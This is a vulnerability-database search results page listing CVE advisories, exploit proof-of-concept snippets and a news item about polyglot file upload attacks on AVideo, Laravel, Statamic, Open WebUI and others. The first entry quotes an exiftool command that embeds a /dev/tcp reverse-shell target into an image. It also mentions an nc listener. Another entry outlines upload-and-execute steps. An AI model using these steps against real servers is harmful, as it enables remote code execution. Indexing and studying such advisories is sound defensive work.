Lucene search
+L

19 matches found

Kitploit
Kitploit
added 2026/09/12 5:41 a.m.5 views

CVE-2023-24610

CVE-2023-24610 This is a proof of concept for CVE-2023-24610 We start by creating a polyglot file using exiftool: exiftool -Comment="/dev/tcp/172.17.0.1/8888 " avatar.png -o polyglot.php We change the file to png so it will pass the front-end check After that, we start a nc listener on port 8888 ...

8.8CVSS7.7AI score0.02121EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/11 2:28 p.m.9 views

EXPLOIT-CVE-2025-27515

CVE-2025-27515 Доказательство концепции Практическая демонстрация CVE-2025-27515 , уязвимости обхода проверки загрузки файлов в Laravel Framework ≤ 12.0.0. Обзор уязвимости CVE-2025-27515 — это обход проверки, позволяющий атакующим обойти ограничения на загрузку файлов, когда приложения Laravel...

9.8CVSS7.5AI score0.00734EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/09 6:10 a.m.6 views

CVE-2023-47129

CVE-2023-47129 - Statamic CMS 버전 " image.jpg 4 이 파일의 이름을 image.php로 변경합니다. 5 양식 페이지에서 생성한 image.php 파일을 업로드합니다. 6 이제 이 파일을 실행하려면 https://yoursite.com/assets/image.php에 접속하면 됩니다. 참고:https://yoursite.com을 테스트 설치 주소로 바꾸세요. 참조 GHSA-72hg-5wr5-rmfc...

9.8CVSS8.2AI score0.01121EPSS
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/08 1:24 p.m.5 views

CVE-2025-58440

CVE-2025-58440 Remote Code Execution RCE via Polyglot File Attack and Null Byte Injection on Laravel FileManager Overview The unisharp/laravel-filemanager package versions 2.11 are vulnerable to Remote Code Execution RCE due to improper file type validation during file uploads. The vulnerability...

6.3AI score
SaveExploits1References1
Kitploit
Kitploit
added 2026/09/08 6:17 a.m.7 views

PyStegosploit

PyStegosploit — Доставка эксплойтов с помощью стеганографии и полиглотов video1 | video2 | page от Charmve - yidazhang1 at gmaildotcom, @Charmve @therealsaumil @amichael Май 2021 Stegosploit создаёт новый способ кодирования «drive-by» эксплойтов браузера и доставки их через файлы изображений. Эти...

5.9AI score
SaveExploits0References2
CVE
CVE
added 2026/08/15 9:25 a.m.57 views

CVE-2026-18438

The CVE-2026-18438 entry concerns the Templately – Elementor & Gutenberg Template Library WordPress plugin (versions up to 3.7.1). Root cause: a filename validation/destination mismatch in fetch_remote_file causes the destination path to be derived from the URL, while the Content-Disposition file...

8.8CVSS5.8AI score0.00903EPSS
SaveExploits0References18
NVD
NVD
added 2026/06/10 8:17 p.m.17 views

CVE-2026-46529

Atril Document Viewer is the default document reader of the MATE desktop environment for Linux. A single-click remote code execution vulnerability in versions prior to 1.26.3 and 1.28.4 allows an attacker to achieve arbitrary code execution as the user by tricking them into clicking a link inside...

8.4CVSS0.00529EPSS
SaveExploits1References21
AlpineLinux
AlpineLinux
added 2026/06/10 7:46 p.m.28 views

CVE-2026-46529

Atril Document Viewer is the default document reader of the MATE desktop environment for Linux. A single-click remote code execution vulnerability in versions prior to 1.26.3 and 1.28.4 allows an attacker to achieve arbitrary code execution as the user by tricking them into clicking a link inside...

8.4CVSS6.5AI score0.00529EPSS
SaveExploits1
CVE
CVE
added 2026/06/10 7:46 p.m.180 views

CVE-2026-46529

Technical details such as affected versions, impact, and remediation are not provided in the supplied documents; monitor for updates from official advisories.

8.4CVSS6.5AI score0.00529EPSS
SaveExploits1References21
Vulnrichment
Vulnrichment
added 2026/05/15 9:26 p.m.10 views

CVE-2026-45315 Open WebUI: Stored XSS via attacker-controlled file extension in /api/v1/audio/transcriptions

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, the audio transcription upload endpoint takes the file extension from the user-supplied filename and saves the file under CACHEDIR/audio/transcriptions/.. The /cache/path route serve...

8.7CVSS5.8AI score0.00186EPSS
SaveExploits1References1
Github Security Blog
Github Security Blog
added 2026/05/14 8:17 p.m.21 views

Open WebUI has stored XSS via attacker-controlled file extension in /api/v1/audio/transcriptions

Summary The audio transcription upload endpoint takes the file extension from the user-supplied filename and saves the file under CACHEDIR/audio/transcriptions/.. The /cache/path route serves these files via FileResponse, which sets Content-Type from the on-disk extension and emits no...

8.7CVSS6.2AI score0.00186EPSS
SaveExploits1References4Affected Software1
RedhatCVE
RedhatCVE
added 2026/03/26 3:00 p.m.11 views

CVE-2026-33647

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the ImageGallery::saveFile method validates uploaded file content using finfo MIME type detection but derives the saved filename extension from the user-supplied original filename without an allowlist check. An...

8.8CVSS5.8AI score0.00639EPSS
SaveExploits1References1
OSV
OSV
added 2026/03/25 5:45 p.m.13 views

GHSA-WXJW-PHJ6-G75W AVideo Vulnerable to Remote Code Execution via MIME/Extension Mismatch in ImageGallery File Upload

Summary The ImageGallery::saveFile method validates uploaded file content using finfo MIME type detection but derives the saved filename extension from the user-supplied original filename without an allowlist check. An attacker can upload a polyglot file valid JPEG magic bytes followed by PHP cod...

8.8CVSS6.1AI score0.00639EPSS
SaveExploits1References4
Github Security Blog
Github Security Blog
added 2026/03/25 5:45 p.m.19 views

AVideo Vulnerable to Remote Code Execution via MIME/Extension Mismatch in ImageGallery File Upload

Summary The ImageGallery::saveFile method validates uploaded file content using finfo MIME type detection but derives the saved filename extension from the user-supplied original filename without an allowlist check. An attacker can upload a polyglot file valid JPEG magic bytes followed by PHP cod...

8.8CVSS6.1AI score0.00639EPSS
SaveExploits1References4Affected Software1
NVD
NVD
added 2026/03/23 7:16 p.m.13 views

CVE-2026-33647

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the ImageGallery::saveFile method validates uploaded file content using finfo MIME type detection but derives the saved filename extension from the user-supplied original filename without an allowlist check. An...

8.8CVSS0.00639EPSS
SaveExploits1References2
Vulnrichment
Vulnrichment
added 2026/03/23 6:23 p.m.9 views

CVE-2026-33647 AVideo Vulnerable to Remote Code Execution via MIME/Extension Mismatch in ImageGallery File Upload

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the ImageGallery::saveFile method validates uploaded file content using finfo MIME type detection but derives the saved filename extension from the user-supplied original filename without an allowlist check. An...

8.8CVSS5.8AI score0.00639EPSS
SaveExploits1References2
Positive Technologies
Positive Technologies
added 2026/03/23 12:00 a.m.30 views

PT-2026-27169

Name of the Vulnerable Software and Affected Versions AVideo versions up to and including 26.0 Description AVideo is an open source video platform. The ImageGallery::saveFile method validates uploaded file content using finfo MIME type detection but derives the saved filename extension from the...

8.8CVSS5.8AI score0.00639EPSS
SaveExploits1References8
The Hacker News
The Hacker News
added 2023/05/08 6:10 a.m.40 views

CERT-UA Warns of SmokeLoader and RoarBAT Malware Attacks Against Ukraine

An ongoing phishing campaign with invoice-themed lures is being used to distribute the SmokeLoader malware in the form of a polyglot file, according to the Computer Emergency Response Team of Ukraine CERT-UA. The emails, per the agency, are sent using compromised accounts and come with a ZIP...

7.3AI score
SaveExploits0
Kitploit
Kitploit
added 2023/02/01 11:30 a.m.41 views

Monomorph - MD5-Monomorphic Shellcode Packer - All Payloads Have The Same MD5 Hash

════════════════════════════════════╦═══ ╔═╦═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╦═╗ ╔═╗ ╔══╔═╗ ╠═╗ ═╩ ╩ ╩═╚═╝═╩ ╩═╚═╝═╩ ╩ ╩═╚═╝═╩ ╠═╝═╩ ╩═ ════════════════════════════════╩═══════ By Retr0id ═══ MD5-Monomorphic Shellcode Packer ═ ══ USAGE: python3 monomorph.py inputfile outputfile payloadfile What does it do? It...

7.4AI score
SaveExploits0References5
Rows per page
Query Builder